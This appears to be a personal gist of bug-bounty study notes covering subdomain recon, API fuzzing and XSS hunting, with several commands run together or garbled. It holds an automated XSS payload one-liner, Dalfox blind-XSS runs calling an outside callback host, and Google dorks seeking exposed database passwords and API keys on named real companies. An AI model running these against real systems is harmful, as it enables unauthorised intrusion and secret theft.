NOTE: THIS IS ARCHIVED (BECAUSE STUPID VSCODE WON'T LOOKUP MORE THAN 100 GISTS AND I CAN'T FIGURE OUT A WAY TO CHANGE IT FOR NOW Link to new one here: New | EDIT
new one https://gist.github.com/ruevaughn/8a8e26533ffe495284e7531daad5d9d0
Hackers Notes
Tools/Tutorials/Other
- Noisy-Hacker Automated XSS
- Amass with Hacking Simplified
- Bug bounty recon Automation using bash | Automate your complete recon | @CyberUF
- The Mass Hunt XSS Technique Bug Bounty Hunters don't want you to know
- Mass Hunt XSS with and without GF Patterns
- Bugbounty Webinar - Recon,Live attacking, Tools by Secoceans | #@secoceans
- BHIS | Hack for Show, Report For Dough: Part 2 w/ BB King (1-Hour)
- Crunchbase - get acquisitions. 2- Get a ASN for thr company. He uses Hurricane Electric
Metabigor 2-
https://github.com/fuzz-security?tab=repositories
He sets up his ubuntu box using his BBHT Repo
He runs Directory Brute forcing because everytime he finds a new host, automatically he runs directory brute forcing on it, just to make sure he finds all the juicy files and folders. He uses Dirsearch as shown here
python3 dirsearch.py -u www.hackerone.com -t 50 -e html# /bin/crtsh
# Also found https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/learn/lecture/24998100#overview 30 seconds in
# Manual
# Automated
curl -s https://crt.sh/\?q\=%25.$1\&output=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
Live Recon and Automation on Shopify's Bug Bounty Program with @TomNomNom
He gathers the wildcard from their scope into wildcards then runs assetfinder then he goes and finds subdomains. cat wildcards | assetfinnder --subs-only | anew domains
If your subdomains end up containing characters at the front of them like
-cisco.shopify.com, a nice low tech way to clean them is tosort(:sortin Vim) and then pop to the end (Gin Vim) so any special characters will go down to the end (I suppose a reverse sort would make them at the beginning) making it easy to trim them out and get rid of any lines beginnig with a*and so on. He keeps the ones starting with_like_dev.shopify.com.
To find what's listening he uses httprobe with a concurrency of 80 'or something like that' Final command herecat domains | httprobe -c 80 --prefer-https | anew hosts he does that to see what respoods on port 443 or 80. He wrote into Httprobe the ability to prefer-https with the --prefer-https flasg.
Previously before anew he would use tee -a. A common use case him is he has a file of domains and he didn't want to have to de-duplicate them all the time, so he created anew. He uses a few different tools to look for domains e.g. assetfider, findomain. anew only adds nenw lines to the file, it works works similar to tee -a except if a line already exists in a file, it doesn't add it. It also outputws what the new lines were so you know what it is adding to the file if thats where stdout is putting the output.x
Starts here
findomain -f wildcards | tee -a findomain.out and then cat findomain.out | anew domains | httprobe -c 50 | anew hosts
If he was to Httprobe the output of findomain before ran anew on them against the domains file which ensures only non duplicate hosts will be displayed as output, then it would run httprobe for ALL of them raher on unique domains. A cool tip to keep the noise low. This highlights a problem with anew / this workflow in my opinion, if something happened (a typo in the command, commad recieved a error code response it can't handle, etc) then httprobe might not get ran and anew would cover up the problem on accident.
Another Tomnomnom video / tutorial: TODO
Move from one working thing to another working thing. Make small modification https://github.com/BlackFan/client-side-prototype-pollution
Methodology Notes #1 - Katie Explains - My Methodlogy
She clicks all the buttons always. She prefers to understand every tool and have a precise reason and goal for usage. Did I mention Click ALL the buttons? Click all the buttons. Make sure you've tried good ol' press all the buttons.
Identify Interesting Endpoints - Learning to recognize interesting endpoits takes lots of time as a developer or lots of time hackinng. Rely on your intuition
Things to look for - signs of interesting endpoints
- ID = IDOR
- Sequential? (ids?)
- Reflected Input = XSS
- Complex Processes = Busiess Logic
- Lots of Data = Information Exposure
API Wordlists - A wordlist of API Names used for fuzzing web application APIs. When do we use wordlists? 2 main times in API recon specifically
When we want to enumerate resources to find new endpoints When we want to enumerate paramters to find additional functionarlity Often this require 2 different Wordlists!
- Public wordlists
- Seclists (API Specific)
- Fuzzdb (API Specific)
- Seclists raft words (list of words)
- Manual Wordlists
-
Similar services might have documented APIS - check for those
-
Or use the waybackmachine method on those API's (nehamsecs videos)
-
Make sure you've tried good old press all the buttons Then start writing sensible words
- What does the app say?
- What actions does it let you do?
/api/v1/profile /api/v1/users /api/v1/posts /api/v1/answers
DEMO: Enumeration API Endpoints using ffuf and Burp Intruder
Scenario: Starting on a new webpage, we don't see much other than a login page. There is not much content to click on. Staring at you is a login. Finally, you check burp. You see /api/users/6 in a BURP web request. Let the fun begin!
- In burpsuite send an API request you want to fuzz to Intruder.
- Remove the existing API function call and replace it with the two SS Characters for each text file you want to use
- On the 'Positions' tab, set Attack type to 'Cluster Bomb'
- On the Payloads tab, select 1 for the first payload set drop-dow then select a payload type of "Runtime file" and navigate to the driectory you downloaded these text files to, select "Actions.txt"
Take notes with Xmind. He finds Acquisitionos with Crunchbase. The he finds ASN numbers for all acquisitions found manually with bgp.he.net
You can use [asnlookup] or [metabigor]
ASN - The Autonomous System Number is a reference to their entire IP Space. A 'Reference Identifier' for all of their Registered Ips/IP Space. Collecting ASNs maually can be important so you don't accidently enumerate over an asset that is NOT in scope, or more in particular of a wrong target altogether.
Take for instance he searched for "Office" and it came up with Office Depot Europe B.V and Office Depot (as it should.) It also came up with "The Office of fhe President". Which... you probably don't want to be enumerating willy Nilly!
Amass - Run amass on the found ASNs amass intel -asn 138603 -config $HOME/.config/amass/config.ini
Whoxy - While Amass is running he runs the company through whoxy. You can get a free api key through Whoxy. There are many Reverse "Who Is" databases find the one you like.
Domlink - give it your api key and your domain and it will find everything for the 'company' and 'email' and all the related domains
He uses the search engine tool Shodan to glean a valuable question: is twitch.amazon.eu (Found prevously using ______) relevant to our testing? Example: `https://www.shodan.io/search?query=twitch.tv
Live Recon on Rockstar Games With @zseano
He created bugbountyhunter.com Where he personally triages bugs you submit.
His Recon is "Figuring out how things work". He will be doing Recon on Rockstar Games. Before he does anythig he reads writeups. In the case of Rockstart Games he noticed a lot of XSS and Open basic vulnerabilities. That says to him that he should just go checkout the webapp and see how it works and log some requests.
- Don't learn to hack, hack to learn
- Sharing is caring
- Hackers question everything!
Inspirations: @Yaworsk, @rohk_infosec and @ZephrFish
Search google.com, google.es etc. for terms like “responsible disclosure program”, “vulnerability disclosure program”, “vulnerability program rewards”, reward program”, inurl: vulnerability disclosure, inurl: responsible disclosureounty Programs
===
Burp, Collaborator, bappstore
Amass, httprobe, aquatone, anew, dnsgen, ffuf
Seclists, Commonspeak, Inputscanner, Linkfinder, Parameth, Mhmdiaa, Anychange
Process for testing for XSS & filtering:
Step One: Testing different encoding and checking for any weird behaviour Test
<h1><img><table>|-> If it is reflected as < or %3C then try for double encodings like %253C and %26lt; |( TIP ) => https://d3adend.org/xss/ghettoBypass Some interesting encodings to try can beThis step is about finding out what's allowed and isn't & how they handle our payload. For example if
<script>was reflected as <script>, but %26lt;script%26gt; was reflected as<script>, then I know I am onto a bypass and I can begin to understand how they are handling encodings (which will help me in later bugs maybe!). If not matter what you try you always see <script> or %3Cscript%3E then the paramerer in question may not be vulnerable.
He first Starts with XSS to get a feel for the overall security of the app. By testing the filters, you can see what parameters are filtered and what is let through. The interestinng thing about his methodology is you know the site is vulnerable, but the filters were put into place by the developers to stop you from exploting it. The thinking behind that is it means even i f the
- [Burp](Burp Suite | https://support.portswigger.net) - Burp Collaborator | https://portswigger.net/bappstore
- DNSGen | If you want to be really thorough and possibly even find some gems, dnsgen by Patrik Hudak (https://github.com/ProjectAnte/dnsgen) works brilliantly:
cat amass-output.txt | dnsgen - | httprobe1 - ffuf | To discover files and directories, FFuF (https://github.com/ffuf/ffuf) is by far the
fastest and most customisable, it’s worth reading all the documentation, however for
basic usage:
ffuf -ac -v -u https://domain/FUZZ -w wordlist.txt.
Wordlists – Every hacker needs a wordlist and luckily Daniel Miessler has provided us with “SecLists” (https://github.com/danielmiessler/SecLists/) which contains wordlists for every type of scanning you want to do. Grab a list and start scanning to see what you can find. As you continue your hunting you'll soon realize that building your own lists based on keywords found on the program can help aid you in your hunting. The Pentester.io team released “CommonSpeak” which is also extremely useful for generating new wordlists, found here: https://github.com/pentester-io/commonspeak. A detailed post on using this tool can be found at https://pentester.io/commonspeak-bigquery-wordlists/
RESOURCES --- Breaking into information security: Learning the ropes 101” by Andy Gill (@ZephrFish).
wd
Summary: He uses a combination of Param Spider, GXSS, and Dalfox to enumerate the endpoints for params,
Goal: Find Xss automatically while doing Bounty Hunting. Video here testvuln.txt
python3 paramspider.py --domain testphp.vulnweb.com/ -o /root/Desktop/testvuln.txtcat testvuln.txt | Gxss -p chocobocat testvuln.txt | Gxss -hoco | dalfox pipe --mining-dict /root/Desktop/Useer/db/params.txt --skip- python3 paramspider.py --domain http://testphp.vulnhub.com -o myparam.txtDalfox)(https://youtu.be/zI7U7Z1u0Gc?t=355)
dalfox file myparam.txt -b me2.xss.ht --proxy http://127.0.0.1:8080 amass enum -list -config config.ini
Download the resolvers as see here and here
He has passive and active commands for amass as seen here
# Passive Recon
amass enum -passive -d hackerone.com -src -dir h1_amass -o output_h1.txt -rf 50-resolvers.txt
# Active Recon
amass enum -active -d hackerone.com -src -dir h1_amass -o output_h1.txt -rf 50-resolvers.txt
# Track
amass enum -track -config ~/HOME/.config/amass/config.ini -d hackerone.com -dir h1_amass
# Viz
amass viz -d3 -dir h1_amass
# Run Python Server
cd h1_amass && python3 -m http server
If runing on a domain with a lot of hosts run using the screen command.
He walks us through setting up a short script (3-4 lines) Here is the basic outline wd:
File: recon.sh
#!/bin/bash
domain=$1
if [[ -z $domain ]];
then
echo -e "Usage ./recon.sh <domain>"
exit 1
fi
mkdir "$domain"
He then Enumereates over subdomains using Subfinder.
echo -e "Enumerating subdomains for "$1""
subfinder -d "$domain" -silent > " $domain"/subs.txtYou can run it using chmod u+x /path/to/recon.sh and then calling it ./recon.sh google.com.
Next he gets all the live subdomains using Httpx.
echo -e "Enumerating Live Subs for "$1""
cat "$domain"/subs.txt | https -title -tech-detect -status-code > "$domain"/live-subs.txt
Next he gets all Urls for the target.
echo -e "Enumerating All Urls for "$1""
cat "$domain"/live-subs.txt | waybackurls > "$domain/All-urls.txt"
To test his script at this point he comments out httpx because it takes the longest to run out of the all.
This is he end of his Part 1. He is going to release the next part to this in a week which I will post the notes on here. He Notes how you can easily add onto this any of the subdomain enumeration tools like Shodan etc.
[Xss Using Automation | s + grep | Bugbountytrick |By-PJBorah]https://www.youtube.com/watch?v=goclfp6a2IQ](https://www.youtube.com/hashtag/cyberteach)
Extract Parameters, Callbacks, Endpoint etc. Using echo . s and regex.
echo 'google.com' | s | grep "redirect="
echo 'google.com' | s | grep "url="Enter Dalfox - as we know by now Dalfox is a great tool for hunting against XSS, and also SQLi, SSTI, and more.
echo 'https://google.com' | s | tee outputurls.txtsHe has the next video which goes over dalfox
From Here He has over 99 GF Patterns. List is there. Get a list of them when you need ideas.
He found 136 links. After GF Patterns, it was 36. The point is, GF patterns can greaty limit you when hunting for xss aka paramters. If you grep by "=" you will find way more.
[Video] by Hacktify Cyber Security
In a previous video he came up with the following payload / oneliner:
waybackurls testphp.vulnweb.com | tee testphp1.txt | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><script>confirm(1)</script>' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \033[0;e31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";doneHe broke this video down into two parts.
1st part - as experienced xss hunters know, in order to find XSS, we need to find parameters. We have all paramters from waybackurls with the help of gf xss patterns / grep "=" works as well to find them. Doing an egrep -iv clears the clutter. When we have the parameters, we just need to check if they reflect special characters.
- Need to check special chars
If special characters are not filtered, and they do reflect back into the response, we confirm the need to put an xss payload in it.
After we have done this step, we are going to narrow down the scope from say 500 to 50 so we send less requests. So now that we have identified special parameters and narrowed our scope down, it's time to come up with a valid xss payload.
- Valid xss Payload
It will put dynamic xss payloads to this narrowed down scope, and only send a valid xss payload to those that are not filtering special parameters.
Essentially, we are being nice to the server and not triggering the WAF.
cat testphpwayback.txt --> read the file
| kxss --> filter special chars
| sed 's/=.*/=/' --> remove everythig after =, add =
| sed 's /URL: //' --> remove URL: and white space
| dalfox pipe --> dalfox tool for xss payload
-b https://me2.xss.ht --> BXSS payload adder.
Read the output of s
After Dalfox pass all urlss to Dalfox usin pipeline mode
For submitting Markdown Reports, Use StackEdit
Blindxss payloads
Dec 12, 2020
Bugbounty Webinar - Recon,Live attacking, Tools | Live Bugbounty hunting | #SECOCEA
You should know Operating Systems Html CSS Javascript PHP
But if you don't know how to code that's ok.
- Bash, Python ( A programming language) Follow Nehamsec, Pentesterland, Hackactivity, Integrity blbsposgedi q
What is:- Reconnaissance (Recon) is an imporant tenchinque for penetration testing and the beginnning point of many data breaches. It involves gathering of information about the target which can be useful for finding flaws or vulnerabilities. Many people never do proper reconnaissance and start attacking the targest which is a wrong way.
Step 1: Choose a Target. He uses Google Dorking to find a program.
responsible disclosure powered by bugcrowd
- Subfinder => to find the Subdomains
- Httpx
- Waybackurls
cat domains.txt | waybackurls > urls
- Dalfox
Google Dorking is justs an advanced technique that is used to search Google's index in a better way. Using this technique you can do a lot of things. You can search for a very specific query or find someone's email and even passwords.
Next he highlights some powerful dorks. Dork #1:
inurl:circonuss.com intitle: "index of"Dork #2: To find out Database Password
inurl:nokia.com filetype:env "DB_PASSWORD"Dork #3: To find Registration Pages
site:oanda.com inurl:signup | inurl:registerDork #4: Find exposed Configuration Files - find information exposure
site:better.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini | ext:env | ext:logStarts here there is a repo startinghere that has a list
Search here
site:outreach.io "Api_key"